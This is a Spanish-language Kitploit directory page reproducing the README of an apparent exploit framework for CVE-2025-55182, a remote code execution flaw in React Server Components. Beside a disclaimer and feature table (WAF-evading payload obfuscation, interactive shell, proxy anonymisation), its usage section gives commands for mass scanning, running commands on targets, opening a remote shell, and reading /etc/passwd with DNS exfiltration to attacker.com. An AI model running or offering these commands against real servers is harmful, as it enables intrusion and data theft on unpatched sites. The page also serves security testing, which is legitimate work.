Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit — Escáner avanzado de RCE para React Server Components para CVE-2025-55182. Características: fingerprinting multietapa, verificación de vulnerabilidades, exfiltración por DNS, shell interactivo, ofuscación de payloads y generación de informes profesionales (JSON/HTML/PDF). Solo para pruebas autorizadas. | Kitploit
Herramientas/GitHubGitHub/cerberusmrxi/cve-2025-55182-advanced-react-server-components-rce-exploit
ReconocimientoEscáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebExfiltración de DatosEvasión de WAFPruebas de PenetraciónHerramienta de Acceso RemotoDesarrollo de Payloads

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
GitHubcerberusmrxi/cve-2025-55182-advanced-react-server-components-rce-exploit

CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit

Ver Repositorio
134hace 2 mesesAún no revisado

Acerca de

Escáner avanzado de RCE para React Server Components para CVE-2025-55182. Características: fingerprinting multietapa, verificación de vulnerabilidades, exfiltración por DNS, shell interactivo, ofuscación de payloads y generación de informes profesionales (JSON/HTML/PDF). Solo para pruebas autorizadas.

Compartir

🔐 ReactRCE-Scanner

CVE-2025-55182 — Framework avanzado de explotación y evaluación de RCE en React Server Components

Version CVE CVSS Python License

Author PRs Welcome Downloads


📑 Tabla de contenidos

  • Aviso legal y advertencia ética

  • Descripción general

  • Capacidades clave

  • Guía de inicio rápido

  • Arquitectura y análisis detallado de funciones

  • Referencia de configuración

  • Suite de pruebas automatizadas

  • Remediación y mitigación

  • Contribución y comunidad

  • Referencias

  • Licencia y autor


⚠️ Aviso legal y advertencia ética

Esta herramienta está diseñada exclusivamente con fines EDUCATIVOS y de PRUEBAS DE SEGURIDAD AUTORIZADAS. La utilización no autorizada de este software contra objetivos sin consentimiento previo por escrito constituye una violación de las leyes internacionales de delitos informáticos, incluida la Ley de Fraude y Abuso Informático (CFAA), los mandatos del RGPD y los acuerdos estándar de términos de servicio. El autor y los colaboradores declinan toda responsabilidad por cualquier uso indebido, operación ilegal o daño consecuente derivado de este programa. Proceda estrictamente bajo su propio riesgo.


📋 Descripción general

ReactRCE-Scanner es un framework de evaluación y verificación de seguridad de nivel empresarial diseñado específicamente para CVE-2025-55182 [1], una vulnerabilidad crítica de ejecución remota de código (RCE) que afecta a React Server Components en las versiones 19.0.0 a 19.2.0.

El framework cierra la brecha entre la investigación teórica de vulnerabilidades y la validación práctica de seguridad. Al incorporar fingerprinting multietapa, rigurosa reducción de falsos positivos, ofuscación avanzada de payloads y generación automatizada de informes en múltiples formatos, proporciona a los ingenieros de seguridad capacidades de diagnóstico precisas.

UsoResultados del escaneo

🎯 Capacidades clave

Categoría de funciónAspecto destacado de la implementaciónEstado operativo
Fingerprinting inteligenteDetección de framework y versión multifuente con algoritmos de puntuación de confianza.✅
Verificación multietapaPipeline de validación de 5 etapas diseñado para eliminar sistemáticamente los falsos positivos.✅
Generación de payloadsConstructor de payloads ofuscados compatible con exfiltración DNS y multicodificación.✅
Shell interactivaEjecución de comandos pseudointeractiva en tiempo real y acceso a shell en objetivos verificados.✅
Informes completosGeneración automatizada de informes en formatos JSON, HTML, PDF y Markdown.✅
Exfiltración DNSExfiltración fuera de banda de la salida de comandos mediante el manejo seguro de consultas DNS.✅
Motor de concurrenciaArquitectura de escaneo multihilo de alto rendimiento para grandes superficies de ataque.✅
Integración de proxyCompatibilidad con proxy HTTP/HTTPS y SOCKS para tráfico de evaluación anonimizado.✅

🚀 Guía de inicio rápido

Instalación

Clone el repositorio e inicialice el entorno utilizando el script de configuración automatizado o la instalación manual de dependencias:

# Clone the repository
git clone https://github.com/CerberusMrXi/CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit.git
cd CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit

# Configure execution permissions and run setup script
chmod +x setup.sh
./setup.sh

# Alternatively, install core Python dependencies manually
pip install -r requirements.txt

Referencia básica de comandos

El framework opera mediante una arquitectura CLI modular que admite validación de un solo objetivo, escaneo masivo desde listas de archivos, apertura de shell interactiva y generación de informes de cumplimiento.

# 1. Perform a vulnerability scan against a single target
python exploit.py -t https://target.com -m scan

# 2. Execute bulk scans from a target list with JSON export
python exploit.py -f targets.txt -m scan -o report.json

# 3. Execute a single command on a verified vulnerable endpoint
python exploit.py -t https://target.com -m exploit -c "whoami"

# 4. Initiate an interactive remote shell session
python exploit.py -t https://target.com -m shell

# 5. Execute commands with out-of-band DNS exfiltration
python exploit.py -t https://target.com -m exploit -c "cat /etc/passwd" -d attacker.com

# 6. Compile a professional executive assessment report in PDF format
python exploit.py -f targets.txt -o assessment_report.pdf --format pdf

🔬 Arquitectura y análisis detallado de funciones

1. Motor de fingerprinting inteligente

El framework realiza un reconocimiento profundo antes de la entrega del payload. Analiza múltiples campos de encabezados HTTP (X-Powered-By, Next-Action, RSC), metaetiquetas estructurales HTML (data-reactroot, __NEXT_DATA__), recursos de compilación estáticos y paquetes de código fuente JavaScript [2] [3].

Las puntuaciones de confianza se clasifican en cuatro niveles:

  • CRÍTICA (95%+): Múltiples indicadores ortogonales confirman versiones vulnerables del entorno de ejecución de React Server Components.

  • ALTA (75–95%): Indicadores estructurales sólidos identificados con coincidencia exacta de versión.

  • MEDIA (50–75%): Marcadores parciales del framework presentes; se requiere verificación manual.

  • BAJA (<50%): Heurísticas débiles detectadas; alta probabilidad de falso positivo.

2. Flujo de trabajo de verificación multietapa

Descargar herramienta